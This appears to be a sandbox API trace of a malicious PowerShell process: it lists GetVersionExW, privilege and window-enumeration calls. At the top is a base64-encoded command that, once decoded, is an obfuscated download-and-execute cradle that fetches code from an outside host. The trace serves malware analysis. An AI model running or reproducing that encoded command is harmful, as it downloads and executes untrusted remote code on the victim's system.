	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 730
	os_tid = 0x166c

	[0445.058] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0588.551] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0594.118] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0594.118] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0594.118] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0594.118] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0610.781] GetVersionExW (in: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0610.784] GetVersionExW (in: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0610.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.733] GetVersionExW (in: lpVersionInformation=0xcd850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0611.733] SetErrorMode (uMode=0x1) returned 0x1
	[0611.734] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9b0 | out: lpFileInformation=0xcd9b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0611.735] SetErrorMode (uMode=0x1) returned 0x1
	[0611.739] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc20 | out: lpdwHandle=0xcdc20) returned 0x94c
	[0611.741] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf72a0 | out: lpData=0x2cf72a0) returned 1
	[0611.743] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb98, puLen=0xcdb90 | out: lplpBuffer=0xcdb98*=0x2cf733c, puLen=0xcdb90) returned 1
	[0611.746] lstrlenW (lpString="䅁") returned 1
	[0611.755] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf7418, puLen=0xcdb00) returned 1
	[0611.756] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0611.758] CoTaskMemAlloc (cb=0x2e) returned 0x2e7810
	[0611.758] lstrcpyW (in: lpString1=0x2e7810, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0611.760] CoTaskMemFree (pv=0x2e7810) 
	[0611.760] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf746c, puLen=0xcdb00) returned 1
	[0611.760] lstrlenW (lpString="System.Management.Automation") returned 28
	[0611.760] CoTaskMemAlloc (cb=0x3c) returned 0x259e80
	[0611.760] lstrcpyW (in: lpString1=0x259e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0611.760] CoTaskMemFree (pv=0x259e80) 
	[0611.760] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf74c8, puLen=0xcdb00) returned 1
	[0611.760] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0611.760] CoTaskMemAlloc (cb=0x20) returned 0x3263d0
	[0611.760] lstrcpyW (in: lpString1=0x3263d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0611.760] CoTaskMemFree (pv=0x3263d0) 
	[0611.760] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf7508, puLen=0xcdb00) returned 1
	[0611.760] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0611.760] CoTaskMemAlloc (cb=0x44) returned 0x259e80
	[0611.760] lstrcpyW (in: lpString1=0x259e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0611.760] CoTaskMemFree (pv=0x259e80) 
	[0611.761] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf7570, puLen=0xcdb00) returned 1
	[0611.761] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0611.761] CoTaskMemAlloc (cb=0x76) returned 0x2bf820
	[0611.761] lstrcpyW (in: lpString1=0x2bf820, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0611.761] CoTaskMemFree (pv=0x2bf820) 
	[0611.761] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf760c, puLen=0xcdb00) returned 1
	[0611.761] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0611.761] CoTaskMemAlloc (cb=0x44) returned 0x259e80
	[0611.761] lstrcpyW (in: lpString1=0x259e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0611.761] CoTaskMemFree (pv=0x259e80) 
	[0611.761] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf7670, puLen=0xcdb00) returned 1
	[0611.761] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0611.761] CoTaskMemAlloc (cb=0x58) returned 0x2a6b80
	[0611.761] lstrcpyW (in: lpString1=0x2a6b80, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0611.761] CoTaskMemFree (pv=0x2a6b80) 
	[0611.761] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf76ec, puLen=0xcdb00) returned 1
	[0611.761] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0611.761] CoTaskMemAlloc (cb=0x20) returned 0x3263d0
	[0611.762] lstrcpyW (in: lpString1=0x3263d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0611.762] CoTaskMemFree (pv=0x3263d0) 
	[0611.762] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cf7394, puLen=0xcdb00) returned 1
	[0611.762] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0611.762] CoTaskMemAlloc (cb=0x66) returned 0x320c90
	[0611.762] lstrcpyW (in: lpString1=0x320c90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0611.762] CoTaskMemFree (pv=0x320c90) 
	[0611.762] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x0, puLen=0xcdb00) returned 0
	[0611.762] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x0, puLen=0xcdb00) returned 0
	[0611.762] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x0, puLen=0xcdb00) returned 0
	[0611.762] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdad8, puLen=0xcdad0 | out: lplpBuffer=0xcdad8*=0x2cf733c, puLen=0xcdad0) returned 1
	[0611.763] CoTaskMemAlloc (cb=0x204) returned 0x2c75b0
	[0611.763] VerLanguageNameW (in: wLang=0x0, szLang=0x2c75b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0612.716] CoTaskMemFree (pv=0x2c75b0) 
	[0612.716] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2cf72c8, puLen=0xcdb20) returned 1
	[0612.722] GetCurrentProcessId () returned 0x1668
	[0612.744] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcca50 | out: lpLuid=0xcca50*(LowPart=0x14, HighPart=0)) returned 1
	[0612.747] GetCurrentProcess () returned 0xffffffffffffffff
	[0612.748] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcca70 | out: TokenHandle=0xcca70*=0x1d0) returned 1
	[0612.749] AdjustTokenPrivileges (in: TokenHandle=0x1d0, DisableAllPrivileges=0, NewState=0x2cfab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0612.750] CloseHandle (hObject=0x1d0) returned 1
	[0612.754] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1668) returned 0x1d0
	[0613.762] EnumProcessModules (in: hProcess=0x1d0, lphModule=0x2cfab80, cb=0x200, lpcbNeeded=0xcda88 | out: lphModule=0x2cfab80, lpcbNeeded=0xcda88) returned 1
	[0613.765] GetModuleInformation (in: hProcess=0x1d0, hModule=0x13f370000, lpmodinfo=0x2cfadf0, cb=0x18 | out: lpmodinfo=0x2cfadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0613.766] CoTaskMemAlloc (cb=0x804) returned 0x32f710
	[0613.766] GetModuleBaseNameW (in: hProcess=0x1d0, hModule=0x13f370000, lpBaseName=0x32f710, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0613.766] CoTaskMemFree (pv=0x32f710) 
	[0613.767] CoTaskMemAlloc (cb=0x804) returned 0x32f710
	[0613.767] GetModuleFileNameExW (in: hProcess=0x1d0, hModule=0x13f370000, lpFilename=0x32f710, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0613.767] CoTaskMemFree (pv=0x32f710) 
	[0613.768] CloseHandle (hObject=0x1d0) returned 1
	[0613.776] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1668) returned 0x1d0
	[0613.777] GetExitCodeProcess (in: hProcess=0x1d0, lpExitCode=0xcdbb8 | out: lpExitCode=0xcdbb8*=0x103) returned 1
	[0613.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb088, Length=0x20000, ResultLength=0xcdb80 | out: SystemInformation=0x12cfb088, ResultLength=0xcdb80*=0x36db8) returned 0xc0000004
	[0614.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b0b8, Length=0x395b8, ResultLength=0xcdb80 | out: SystemInformation=0x12d1b0b8, ResultLength=0xcdb80*=0x36db8) returned 0x0
	[0614.928] EnumWindows (lpEnumFunc=0x2b366ac, lParam=0x0) 
	[0622.450] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0622.791] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x558
	[0622.796] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0623.857] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0624.674] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0624.683] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x538
	[0624.687] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0624.690] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0624.692] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0624.695] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0624.696] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0625.440] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0625.639] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0626.461] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0626.931] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0626.935] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0626.941] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0626.944] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x460
	[0626.947] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0627.862] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4d0
	[0629.496] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x3a8
	[0629.713] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1bd0
	[0629.720] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1bfc
	[0629.723] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1a78
	[0629.726] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b90
	[0629.732] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b04
	[0631.439] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b34
	[0631.439] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1b64
	[0631.439] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1bb0
	[0631.439] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1acc
	[0631.439] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1a2c
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x19a8
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1944
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x18c8
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x18ac
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x18ec
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1898
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc98
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x153c
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1808
	[0631.440] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x12a4
	[0631.441] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1740
	[0631.441] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x16c4
	[0631.441] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1820
	[0631.441] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x16ac
	[0631.441] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1858
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1664
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10b4
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10ac
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x10ec
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1068
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x17e0
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x102c
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x17a4
	[0631.442] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1050
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1694
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1770
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1720
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x165c
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1578
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x16c0
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x161c
	[0631.443] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1638
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x15c8
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1554
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1674
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1520
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x14bc
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xf8c
	[0631.444] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xe9c
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1434
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x14ec
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xfcc
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x12ac
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1484
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x934
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc0c
	[0631.445] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb08
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x948
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x1178
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x13e0
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xcd0
	[0631.446] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x13fc
